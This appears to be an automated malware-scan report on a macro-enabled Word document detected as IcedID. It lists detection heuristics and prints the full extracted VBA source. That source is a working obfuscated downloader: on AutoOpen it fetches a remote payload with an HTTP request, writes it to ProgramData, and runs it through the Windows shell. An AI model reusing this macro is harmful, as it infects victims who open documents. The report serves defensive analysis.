MALICIOUS
290
Risk Score
Heuristics 7
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set aEnkX = CreateObject(WpKaj + "." + "shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set BNexw = VBA.CreateObject(ncbar + "" + xDJFk) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13464 bytes |
SHA-256: f42a562fb2024bd712683c2e0e9a3e535352c275380426db6e29ed2cc43f879f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NfpGe"
Sub qsiXo(ZCiNB, Optional ByVal KmGhd As String = "c:\programdata\tELNv.txt", Optional ByVal xDJFk As String = "systemobject")
' Acquitting
' Evened canticles burn
' Skirl bureaucratically tested pacifists idiom
' Overtures disappears mortality
' Shoestring thrusts uncoil cuisine
' Photochemistry headbands maniacal
' Crazily tummies flypaper corpuscle
' Aggressively gaiters longawaited wriggled sumatra
' Profligate reciprocals twilight indoctrinator patrolled applicator gourmets
' Vatican politicians bright anagram
' Inanely emulate pupating expedients abrasives
' Lagged buttress scat
' Budded shrewder recoils
' Macaw postpones shoves ampuls coplanar
' Contradictorily purgative
' Semantically musk
' Assenting screwdriver workbooks
' Monolingual topping irony connoisseurship
' Accelerator
Set BNexw = VBA.CreateObject(ncbar + "" + xDJFk)
' Procures eyes
' Flayers guacamole worrier asides
' Articled transgressor waverers bleating wretches
' Copyrighted medlar paediatric trueblue emotions
' Redirect photostat regulations polymer
' Solidifying squeals
Set ijDGE = BNexw.CreateTextFile(KmGhd)
' Supernumerary earthiness drunks trimmed
' Fastest pariah nay
' Coffers beirut learnable
' Ultimate tramcars depressingly
' Snappily
' Uterus plucker furtiveness misleads duskier
ijDGE.WriteLine ZCiNB
' Disinfecting mat zippy
' Debutantes
' Shamanic albinism
' Coupes
' Reticulum wagon proposing
ijDGE.Close
' Sharpening expanse percussionists
' Prosecutions bole
' Praises parental complot
' Littleness memphis masted
' Probate materialistically sneak
' Hems decreasingly
' Helpers thorium gunship soiling critically racialists
' Banter lyricism rebounding
' Gobbles novices calcareous evaders evolutionists
' Fearless disillusioning satyr supervising heroic
' Heresies gynaecologists gnashed conceptualisation pachyderm
' Tumour peptide
' Predisposing eventide
' Delegation looking bless
' Glisten undisplayed unsympathetically
' Syndicated
' Chastening crusted electrician
' Inarticulate frameup perpetrate rests menthol
' Douching brain immaterial
' Libertarians monostable
' Dante arachnid
' Droller stewed umbrage sweetheart expunge
' Hummocky fortnight
' Synchronicity boniest snipped
' Whole cation sweetness
' Emulation expropriate cannes
' Polyethylene
' Incapacitates stoical debunk envelopers precis thriving
' Contractors codename gramophones multiplies meet
' Crystallography unstack impairs stockbroker fenced pest
' Pancake delate towel
' Cocain torchbearer deadly carsick
' Dialler serial
' Statistical silting unwrapping transformed regurgitate
' Interrogations
' Holed vainest dustbins soundless
' Tinder size observed assyrian
' Occurs facades
' Impotence fascias diagonals
' Bestsellers exterminator
' Raining remitting spotty
End Sub
' Boggled gangways charades undressing
' Courtiers transpires unmasked
' Vertices reticule investment clandestinely
' Multilevel rationalise personality epidemics sucked
' Mineshaft bridegrooms gobbledegook cassocks
' Surpass tipsters snooker heists
Sub AutoOpen()
' Enlivens voyaged ecumenically gazing
' Referees
' Uninsulated skim dams readymade unpalatable prolactin unappealing
' Sones
' Dozing
' Arranger materialise
' Acknowledging shave mistimed
' Visualisation expend
' Verona
' Drape steels adventured mafia
' Mandated circa observationally
' Unexpanded snowmen forethought
' Lamentation bumpy gannets baboons conceal
' Jackasses mineral wilting launched
' Needlecraft mutant
' Shackled detoured wellbeing
' Florins peach
' Metamorphism leaps affiliated endangering
' Legibly
' Streaming childhoods aimless warbling
' Keeping ingeniously stripy cannibal
' Inbound catheters shiniest
' Stayed diva questing heatresistant
' Directories statement demagog scooping perspectives
' Jussive wicketkeepers piles appointed
' Puzzled correlations remorsefully
' Behest dumbfound abominations motioned westernised
' Bedfellow waning sediments crashes unpredicted pacifist
' Pancreatic crime representable
Dim vNtjh As New UccEI
' Deliveries pungency serve
' Magnanimous
' Forge scourge
' Unmasks penury
' Driers dizziest extinctions comparable
cLQjU = ""
' Immunologist ectopic
' Agitations auk undomesticated maximality meromorphic weds
' Wrangle pacify
' Steadiest torchbearers art tumults tantalum
' Permissible
' Demarcated revolvers overthrows fullscale protocol backwards
' Lifeguards toffy convulsive recopy sullied
' Somersault celebrant crocks
' Saint
' Polymer trice unfettered
' Classifications coating panties subspecies
' Fleshless
' Cauliflowers
ZCiNB = vNtjh.fbsyo(twvfS)
' Lanyard domiciled branched
' Consortia
' Crisscrossed shuttered deliberated demagogic namesakes tourist
' Pajamas cords
qsiXo AVqDG(ZCiNB)
' Inflexion liberty herring dank define
' Piccolo mathematician doorbell anaerobically masterful
' Hummable heifers
' Nightmare
' Recommencement
' Soot cleverness
' Coulombs chromium convex looking
' Conservationists police
' Spook cloves
' Streakers differing unsharable maturation necks
' Intensify
' Hurriedly paring
Svbci jZuLf(0) + "vr32 c:\programdata\tELNv.txt", "wscript"
End Sub
Function gzVHC(uxXqh, LbwhE)
' Outpouring lousy blacked erectly freights
' Intellectually landlady cometary
' Tobogganing acoustics blowup
' Feudalism faceting pinafore
' Gatherers
gzVHC = Split(uxXqh, LbwhE)
End Function
Attribute VB_Name = "qXBIi"
' Bailed palaver apologises lecher
' Eeriness oxtails topples equable bordering
' Notational lightheartedly resold unexploded hampers
' Backbenchers
' Slamming embolden importunity cripple
Function AVqDG(GHCOe)
' Crewman outstripped
' Pertinacity considerately pluses outlives
' Unfashionable trustworthy closers
' Estimated
AVqDG = StrConv(GHCOe, vbUnicode)
' Digital complacent
' Acrid usurp
' Crossbars spiritually higher react
' Enmity swarmed
' Soon fullpage meriting tolling
End Function
' Sublimed shatterproof
' Haystacks associations chisels
' Rioters outlooks stacked revels
' Frowned bedazzle recoiling
' Ambushes kindnesses
Function HjpoR()
' Affliction figural subsumes
' Canister maintenance
' Arks protocols curved outlasts
' Ablates calmed jaundice usages
' Intoning gingivitis
' Technologies textured untestable bursary
' Encryption
' Mega spurious provident foraged bra
' Tapers retinues associations splicer bullock grinded
' Spittoon routes consumes rugs
With ActiveDocument.shapes(1)
HjpoR = .AlternativeText
End With
End Function
' Vinegar hardheartedness monomeric
' Choral internuclear
' Unsurpassed
' Partridges derive maintain evolutionary atonement
' Ravine trainee freesia selfportrait
' Collage mousse
Function jZuLf(QNPRW)
' Enciphering rancorous
' Prosperous
' Someday
' Upright costless demonstrators unbuckling
' Inquisitions propitiatory
' Liens compartmentalisation quarantine
' Refrain apostles
' Dogged funniest ridged check fortnightly
' Brainwashed inconveniences inadvertence blunts
' Inefficiently orate
' Mechanically serialisation
' Spare translators recaps diaper trumpeted
yCYLt = gzVHC(HjpoR(), "~~~")
oNkQy = yCYLt(QNPRW)
jZuLf = oNkQy
End Function
Attribute VB_Name = "UccEI"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function crAbc(GYHuC, TuInZ, dPVli)
' Eukaryotes quickly prerogatives misted
' Plaque
' Postured flannel
' Fathomless technophobia scholasticism truncate
crAbc = Mid(GYHuC, TuInZ, dPVli)
End Function
Public Function SpZUr(VRGgv, TpLKG)
' Tonics verbosity skip
' Colonise dinner lunched allowances
' Bravo instrumentality inlays
' Divot
' Tractability winnowing produce
' Convenience whirling definer anymore
' Silently benefits homogenisation
' Quiveringly sneakers smogs certified
' Informatory intensive enhancers automates alms
' Lunar stamps gavotte wetter reminding
' Uniting vindicate
' Dovecot creditors
' Unregistered zaire dizzying arrogant intoxicant
' Pretences rotas furnace freelance
' Abyssal exoskeleton ectoplasm
gBDQN = Trim(VRGgv)
For VMEDH = TpLKG To Len(gBDQN)
GhgQh = crAbc(gBDQN, VMEDH, TpLKG) & GhgQh
Next VMEDH
SpZUr = GhgQh
End Function
' Tares indexation cutlasses
' Hotels icecap white
' Cortisone interwoven
' Galloping croquette
Function fbsyo(cqtRY)
' Contradiction
' Allots stated
' Redemption riflemen
' Longer axiomatising
' Neuroscience unattractiveness spectrophotometry prejudge
' Gratis visited
' Remainder unwind disturb
Dim QxAaP As Object
' Gazetteer wooer longsuffering
' Tasted jewel uncheckable tautologous
' Impersonated debauch
' Hardening rendezvoused resolve autobahn
' Helpful disenfranchises suppliants mowing
' Whiskey woodcutter
' Severity hectic glazer hipsters schist fireball nether
' Hangovers fiddlers heavenward chevrons protruding outlay
' Peep subconscious intercountry crocodile lobbing schemata
' Furrow disconnection malformations blows convulsing uncle
' Planing biographical prophecy oath
Set QxAaP = CreateObject(SpZUr(cqtRY, 1) + "." + SpZUr(cqtRY, 1) + "Request.5.1")
' Reanimated
' Assembling actions
' Crusading sauciness wormholes outflows
' Greyhound
' Proper vigour diggings
' Blots momentous gourd statue tallies referenda phosphorus mellowing
' Cybernetic possibly
' Doubtlessly oat epiphenomenon confoundedly homoeopathic parametrisation
' Mistiness sulky pillars slashes
' Fleet delineates reproductive shaded disapprobation
' Formulate
' Demoralising unawareness epitomises scuttles
' Trolley cadenzas espadrilles optimisations
' Exulting hexagons excitations genoa megajoules succinct
' Sparked subcutaneously
' Sprig redefiner unreferencing
' Mangroves modifiable folding luna
' Muzzled rallying panders captive
' Concoctions regionally
' Aeon loquacious waxwork constituent renunciations
' Adjectives stuns apostrophe
ovemA = jZuLf(1)
' Forwardlooking redeployment bargainers
' Inked chiller dishes
' Naturalness electrify
' Sessile coercer quartiles anonymously
' Foehns
' Avoidable indissoluble excess extraterrestrial unresolvable mutterings splintered
QxAaP.Open "GET", SpZUr(ovemA, 1), False
' Overseeing cramps
' Armistice reinitialising elementary colitis toasty unscrewing
' Freaks copiers robbing aftereffects
' Taxidermist revenges ionise
' Heavens doughty cores
' Wearer predominance wrathfully triumphing
' Chaffinch cretaceous orates
' Warning slanderer lenin
QxAaP.Send
' Peculiarly gutless warhorse yokels intercountry cold
' Stylistically
' Arbitrarily debentures
' Gash
' Sidelines phototypesetting closeknit pantheistic interferences assailed
fbsyo = QxAaP.responsebody
End Function
Attribute VB_Name = "kbzai"
Public Const twvfS As String = "ptthniw"
Public Const ncbar As String = "scripting.file"
Sub Svbci(TuMjt, WpKaj)
' Hollowness
' Eligibly dims inactivation
' Armouries defrosted
' Usurped decipherment
' Terrapins shipshape callup philosophic aerobraking
Set aEnkX = CreateObject(WpKaj + "." + "shell")
' Powerboats golly caps sporty stinky
' Gnat boggles
' Immigration marmot cohesion
' Austria moonshot
' Counterbalanced amalgamation
' Acknowledge jazzier heavyweights dangerously exert
' Reprojected splintering
' Adored hinder stillborn removing lawnmowers ascents
' Trainee thinned proponents
' Polyester aerating
' Trappers womanhood discountability
' Perfectionists teaches bay zealous gargantuan
' Double passageway
' Corporatism correlated stupidity carrot cornering
' Comparator branched endometrium
' Rigging rapacious
' Pears bounce corpse ensures gangs
' Afforested leucine abolishes windowed
' Microlight
' Sopping shifts
' Hospitalisation loudhailer copywriter masochism sawmills
' Obtuseness cow preoccupy revivals quizzed fatal teargas
' Savagery iotas invents less gazing
' Eyelashes burdened internalise proposes
' Tadpoles modifying typicality
' Plunging pyrites chattily deserter personalising
' Sublime
' Elderly dates formatted crewing trolley
' Upkeep petal hooking valise parodying econometrics
' Gelding spillage snappier server predictions
' Mouthwatering technophobic horseplay combusted hysterically
' Dullard warehousing rightfully libeller
' Never pumpkin sulked hardback
' Concentrated distinguishably slushier
' Misfortune dismemberment encode
' Obsolescent fustian expanses
' Workaday
' Mindlessly cultivating quartile
' Transposed elopement degenerate
' Abortion outspan growler
' Novelistic tresses encirclements unwaveringly mitten interruptibility
' Gurgled
' Popping begets visors schist suburbia angel
' Feeblest teen lilliput
Call aEnkX.exec(TuMjt)
' Khan schwas iran chuck
' Catalyst clink polygynous remould
' Perfectionism hypnotised impresses importing exclusively
' Constructively works shun
' Imbecile mowing normalise
' Fretwork dumbness corporeally chanced likeminded
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 48128 bytes |
SHA-256: 75cca93bf434bf6a99f35a28e0cf8e2cd0b244861e0502d06ffd84e0c8f6d458 |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.